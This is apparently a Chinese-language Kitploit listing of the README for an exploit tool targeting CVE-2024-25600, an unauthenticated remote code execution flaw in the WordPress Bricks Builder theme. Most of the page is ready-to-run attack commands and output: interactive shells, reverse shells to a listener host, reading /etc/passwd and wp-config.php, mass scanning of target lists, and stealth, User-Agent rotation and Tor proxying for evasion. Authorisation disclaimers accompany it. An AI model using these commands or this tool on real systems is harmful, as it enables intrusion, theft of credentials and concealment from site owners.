Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WP-Bricks-Exploit-CVE-2024-25600 — CVE-2024-25600 - WordPress Bricks Builder主题的未认证RCE漏洞利用。高级漏洞利用框架,具有交互式shell、反向shell、文件上传/下载、异步扫描、隐身模式、代理支持和多线程漏洞扫描。仅用于授权安全测试。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/wp-bricks-exploit-cve-2024-25600
侦察漏洞扫描器漏洞利用ShellcodeWeb应用程序漏洞利用信息收集渗透测试命令与控制红队

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Payload 开发
GitHubcerberusmrxi/wp-bricks-exploit-cve-2024-25600

WP-Bricks-Exploit-CVE-2024-25600

CVE-2024-25600 - WordPress Bricks Builder主题的未认证RCE漏洞利用。高级漏洞利用框架,具有交互式shell、反向shell、文件上传/下载、异步扫描、隐身模式、代理支持和多线程漏洞扫描。仅用于授权安全测试。

查看仓库
111个月前尚未审核

BricksRCE Exploiter

CVE-2024-25600 — WordPress Bricks Builder 未认证远程代码执行

Python 版本 CVSS CVE 许可证 平台

CVE-2024-25600 授权安全评估工具
作者:Sudeepa Wanigarathna · 工具:BricksRCE Exploiter v1.0
主脚本:cve-2024-25600.py

b

[!IMPORTANT] 仅限授权使用。 本工具仅用于安全研究、教育以及测试您拥有或已获得明确书面许可的系统。未经授权访问计算机系统是非法的。作者对滥用行为不承担任何责任。


目录

  • 概述
  • 漏洞详情
  • 功能
  • 安装
  • 快速开始
  • 使用指南
  • 命令参考
  • 交互式Shell
  • 输出与日志
  • 故障排除
  • 仓库结构
  • 版本历史
  • 免责声明
  • 作者与致谢
  • 许可证

概述

CVE-2024-25600 是 WordPress Bricks Builder 主题中的一个严重、未认证的远程代码执行漏洞。在 render_element REST 端点中对用户控制的输入处理不当,允许未认证的攻击者在受影响的目标上执行任意 PHP/系统命令。

BricksRCE Exploiter(cve-2024-25600.py)是一款功能全面的 Python 评估工具,供授权安全专业人员使用,用于:

  • 检测存在漏洞的 Bricks Builder 安装
  • 通过受控命令执行验证影响
  • 通过交互式 shell 与被入侵主机交互
  • 使用异步/线程工作器批量扫描目标列表
  • 导出结构化结果用于报告

漏洞详情

受影响的端点

端点方法
/wp-json/bricks/v1/render_elementPOST
/?rest_route=/bricks/v1/render_elementPOST

攻击总结

  1. 从目标页面源码中提取 Bricks nonce
  2. 提交一个包含恶意元素 payload 的精心构造的 render_element 请求
  3. 服务器端代码评估导致任意命令执行

参考

  • CVE-2024-25600 (MITRE)
  • NVD 条目
  • Bricks Builder 更新日志/安全公告

功能

核心能力

操作控制

报告

能力描述
JSON / TXT 导出保存扫描结果和受感染目标
命令历史可选的已执行命令日志
文件日志持久化 bricks_rce.log 及自定义日志路径

安装

前提条件

  • Python 3.8+
  • pip
  • 能够网络访问授权目标

安装步骤

root@kitploit:~
git clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2024-25600.py --help

依赖

root@kitploit:~
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0          # 可选 — SOCKS5 代理支持

快速开始

将 https://target.example 替换为实验环境或已授权的目标。

root@kitploit:~
# 交互式 Shell
python3 cve-2024-25600.py -u https://target.example

# 单命令
python3 cve-2024-25600.py -u https://target.example --cmd "id"

# 批量扫描
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json

# 版本检测
python3 cve-2024-25600.py -u https://target.example --detect-version

# 通过 Burp 代理
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

使用指南

所有示例均使用主脚本:cve-2024-25600.py

1. 查看帮助

root@kitploit:~
python3 cve-2024-25600.py --help

2. 单目标交互式 Shell

在确认目标存在漏洞后,打开一个交互式 RCE Shell。

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example

工作流程:

  1. 规范化并验证 URL
  2. 从页面提取 nonce
  3. 验证漏洞(除非指定 --force)
  4. 进入交互式 Shell

3. 执行单条命令

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "whoami"

将命令输出保存到文件:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output

4. 选择 Payload 类型

root@kitploit:~
# 默认 PHP 异常型 payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php

# system() 型 payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system

5. 检测 Bricks Builder 版本

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version

与命令结合使用:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"

6. 提取 wp-config.php

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --extract-wp-config

成功时保存为 wp-config_<target>.txt。

7. 反弹 Shell(仅限授权的实验环境)

root@kitploit:~
# 终端 1 — 监听器
nc -lvnp 4444

# 终端 2 — bash 反弹 Shell
python3 cve-2024-25600.py -u https://target.example \
  --reverse-shell bash \
  --lhost 10.0.0.5 \
  --lport 4444

所有支持的反弹 Shell 类型:

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc     --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php    --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl   --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby   --lhost 10.0.0.5 --lport 4444

8. 强制模式(跳过漏洞检查)

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"

9. 从文件批量扫描

root@kitploit:~
# targets.txt — 每行一个 URL
python3 cve-2024-25600.py -f targets.txt

带线程、延迟、隐身模式和 JSON 输出:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 15 \
  --delay 0.5 \
  --stealth \
  -o vulnerable.json

同步(线程池)扫描(替代异步):

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt

静默批量扫描:

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt -q -o results.json

10. 端点选择

root@kitploit:~
# 两个端点(默认)
python3 cve-2024-25600.py -u https://target.example --endpoint both

# 仅 /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json

# 仅 /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route

11. 隐身模式

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --stealth \
  --delay 1.0 \
  --max-retries 5 \
  --timeout 20

12. 自定义 User-Agent

root@kitploit:~
# 自定义 UA
python3 cve-2024-25600.py -u https://target.example \
  --user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"

# 禁用随机 UA 轮换
python3 cve-2024-25600.py -u https://target.example --no-random-ua

13. 代理支持

root@kitploit:~
# HTTP 代理(例如 Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v

# SOCKS5 代理
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050

# SOCKS5h(通过代理/Tor 进行 DNS 解析)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050

14. SSL 验证

root@kitploit:~
# 启用 SSL 证书验证(默认禁用)
python3 cve-2024-25600.py -u https://target.example --verify-ssl

15. 输出与日志

root@kitploit:~
# 将扫描结果保存为 JSON
python3 cve-2024-25600.py -f targets.txt -o results.json

# 将扫描结果保存为 TXT
python3 cve-2024-25600.py -f targets.txt -o results.txt

# 自定义应用程序日志文件
python3 cve-2024-25600.py -u https://target.example --log-file assessment.log -v

# 记录执行的命令
python3 cve-2024-25600.py -u https://target.example --command-log commands.log --cmd "id"

16. 详细与静默模式

root@kitploit:~
# 详细/调试日志
python3 cve-2024-25600.py -u https://target.example -v

# 静默模式(最小输出)
python3 cve-2024-25600.py -u https://target.example -q --cmd "id"

17. 性能调优

root@kitploit:~
python3 cve-2024-25600.py -f targets.txt \
  -t 25 \
  --timeout 20 \
  --delay 0.2 \
  --max-retries 5 \
  -o results.json

18. 组合全面评估示例

root@kitploit:~
python3 cve-2024-25600.py -u https://target.example \
  --detect-version \
  --extract-wp-config \
  --stealth \
  --delay 0.8 \
  --timeout 20 \
  --max-retries 5 \
  --endpoint both \
  --proxy http://127.0.0.1:8080 \
  --log-file bricks_assessment.log \
  --command-log commands.log \
  -v

19. 交互式 Shell 内置命令

使用 -u 启动后(未指定 --cmd / --reverse-shell):

root@kitploit:~
Shell> whoami
Shell> id
Shell> pwd
Shell> ls -la
Shell> help
Shell> clear
Shell> download /etc/passwd
Shell> upload ./local.txt /tmp/remote.txt
Shell> php id
Shell> system uname -a
Shell> exit

命令参考

目标选项

参数描述
-u, --url单个目标 URL
-f, --file包含目标 URL 的文件(每行一个)

扫描选项

隐身选项

利用选项

输出选项


交互式 Shell

当没有指定 --cmd 或 --reverse-shell 时针对单个目标进行利用,会打开一个交互式 Shell:

root@kitploit:~
Shell> whoami
www-data

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell> help

内置命令

功能

  • 命令历史持久化到 ~/.bricks_rce_history
  • 常用命令自动补全
  • 基于历史记录的自动建议(prompt-toolkit)

输出与日志

控制台

基于 Rich 的面板、进度条和结果表格:

root@kitploit:~
[*] 测试中:https://target.example
[+] https://target.example 存在漏洞!
[+] 交互式 Shell 已成功打开

扫描结果表

指标描述

JSON 导出(-o results.json)

root@kitploit:~
{
  "timestamp": "2026-07-17T01:30:00",
  "version": "1.0.0",
  "config": {
    "threads": 10,
    "timeout": 15,
    "delay": 0.5
  },
  "stats": {
    "processed": 100,
    "vulnerable": 3,
    "failed": 97
  },
  "vulnerable_targets": [
    {
      "url": "https://target.example",
      "timestamp": "2026-07-17T01:31:12"
    }
  ]
}

日志文件

文件用途
bricks_rce.log默认仅追加的应用程序日志
--log-file PATH额外的自定义日志处理程序
--command-log PATH已执行命令的审计跟踪

故障排除

调试工作流程

root@kitploit:~
# 详细单目标检查
python3 cve-2024-25600.py -u https://target.example --detect-version -v

# 通过 Burp 检查请求
python3 cve-2024-25600.py -u https://target.example \
  --proxy http://127.0.0.1:8080 -v --cmd "id"

# 优先使用特定端点
python3 cve-2024-25600.py -u https://target.example --endpoint json -v

仓库结构

root@kitploit:~
exploit/
├── cve-2024-25600.py     # BricksRCE Exploiter (v1.0)
├── requirements.txt      # Python 依赖
├── README.md             # 本文件
├── bricks_rce.log        # 运行时日志(自动生成)
└── venv/                 # 本地虚拟环境(可选,不提交)

版本历史

v1.0.0 — 初始版本

  • CVE-2024-25600 未认证 RCE 检测与利用
  • 多种 nonce 提取方式
  • 交互式 Shell,支持上传/下载
  • 单命令与反弹 Shell 模式
  • 异步/线程化批量扫描
  • 版本检测与 wp-config 提取
  • 隐身模式、UA 轮换、代理支持
  • 基于 Rich 的 CLI,支持 JSON/TXT 结果导出

免责声明

本项目按原样提供,仅用于防御性安全研究和授权渗透测试。

使用本软件即表示您同意:

  1. 您仅会针对您拥有或明确授权测试的系统。
  2. 您了解适用的计算机滥用和数据保护法律。
  3. 作者和贡献者不对因滥用造成的损害、数据丢失或法律后果承担责任。

如果您在您不拥有的生产环境中发现此漏洞,请遵循负责任的披露实践,并与网站所有者 / Bricks Builder 安全团队协调。

未经授权访问计算机系统是联邦犯罪行为。


作者与致谢


许可证

root@kitploit:~
MIT License

Copyright (c) 2024–2026 Sudeepa Wanigarathna

特此免费授予任何获得本软件及相关文档文件(“软件”)副本的人,无限制地处理本软件的权利,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或销售软件副本的权利,并允许向其提供软件的人这样做,前提是满足以下条件:

上述版权声明和本许可声明应包含在软件的所有副本或实质部分中。

本软件按“原样”提供,不提供任何形式的明示或默示保证,包括但不限于适销性、特定用途适用性和非侵权性的保证。在任何情况下,作者或版权持有人均不对因软件或软件的使用或其他交易而产生的任何索赔、损害或其他责任负责,无论该等责任是基于合同、侵权或其他原因。

支持

  • 如果本工具对您的授权研究有帮助,请为仓库点星
  • 如有 Bug、误报或检测改进,请提交 Issue
  • 欢迎为文档和授权实验环境的用户体验提交 Pull Request

仅限授权安全测试。

下载工具
属性值
CVE IDCVE-2024-25600
CVSS9.8(严重)
攻击向量网络——未认证
影响完全远程代码执行,危及机密性/完整性/可用性
受影响产品WordPress Bricks Builder 主题
受影响版本Bricks ≤ 1.9.6(已在 1.9.6.1+ 中修补)
漏洞类型未认证远程代码执行
CWECWE-94(代码生成控制不当)
能力描述
漏洞检测通过受控标记探测确认 RCE
Nonce 提取多种 nonce 发现方式(脚本、页面源码、meta、REST)
版本检测从 CSS / readme / REST 识别 Bricks Builder 版本
交互式 Shell完整的 REPL,支持历史记录、自动补全和文件传输
单命令模式执行一条命令后退出(便于脚本化使用)
反弹 Shell 辅助生成 bash / nc / Python / PHP / Perl / Ruby 反弹 shell
wp-config 提取尝试定位并读取 wp-config.php
批量扫描从 URL 列表中异步或线程化多目标扫描
能力描述
速率限制请求间可配置延迟
重试逻辑超时和连接错误时指数退避
User-Agent 轮换每个请求随机生成浏览器指纹
隐身模式随机化 Accept-Language / Accept-Encoding 头
代理支持HTTP、HTTPS、SOCKS5 / SOCKS5h
双端点优先使用 wp-json、rest_route 或两者
强制模式跳过预检查,直接尝试利用
富 CLI通过 Rich 实现进度条、表格和彩色面板
参数默认值描述
-t, --threads10批量扫描的并发工作器数
--delay0.5请求间延迟(秒)
--timeout15HTTP 请求超时(秒)
--max-retries3失败时的重试次数
--force关闭跳过漏洞检查
--sync关闭使用线程池而非异步
参数描述
--user-agent自定义 User-Agent 字符串
--no-random-ua禁用 User-Agent 轮换
--proxy代理 URL(http://、https://、socks5://、socks5h://)
--stealth启用隐身模式(随机头部 + 延迟)
--endpointjson | rest_route | both(默认:both)
参数描述
--cmd执行单条命令后退出
--payloadPayload 类型:php(默认)或 system
--reverse-shellShell 类型:bash、nc、python、php、perl、ruby
--lhost反弹 Shell 的监听主机
--lport反弹 Shell 的监听端口
--extract-wp-config尝试提取 wp-config.php
--detect-version检测 Bricks Builder 版本
--save-output将单命令输出保存到文件
参数描述
-o, --output结果文件(.json 或 .txt)
--log-file自定义详细日志路径
--command-log将执行的命令记录到文件
-v, --verbose调试日志
-q, --quiet最小化控制台输出
--verify-ssl启用 SSL 证书验证(默认关闭)
命令描述
exit退出 Shell
help显示帮助
clear清屏
download [remote]下载远程文件(base64 传输)
upload [local] [remote]上传本地文件到目标
php [cmd]通过 PHP payload 执行(默认)
system [cmd]通过 system() payload 执行
已处理总数扫描的 URL 数量
成功确认存在漏洞
失败无漏洞/不可达
发现漏洞确认 RCE 的目标数量
已执行命令RCE 命令执行总次数
消耗时间扫描的挂钟时长
症状尝试方法
未找到 Nonce确认 Bricks 已激活;尝试 -v;确保前端页面可正常加载
目标不存在漏洞确认 Bricks ≤ 1.9.6;尝试 --force;检查两个端点
连接超时提高 --timeout / --max-retries;检查代理
遇到速率限制(429)增加 --delay;启用 --stealth
SSL 错误默认跳过验证;仅在必要时使用 --verify-ssl
异步不稳定使用 --sync 进行线程化扫描
反弹 Shell 失败确认监听器已启动;尝试其他 Shell 类型(python、nc)
命令输出为空命令可能成功执行但无标准输出;尝试 echo test
未找到 wp-config路径因主机而异;使用交互式 Shell 执行自定义 find / cat
角色姓名
工具作者Sudeepa Wanigarathna
CVECVE-2024-25600
工具BricksRCE Exploiter v1.0
主脚本cve-2024-25600.py
许可证MIT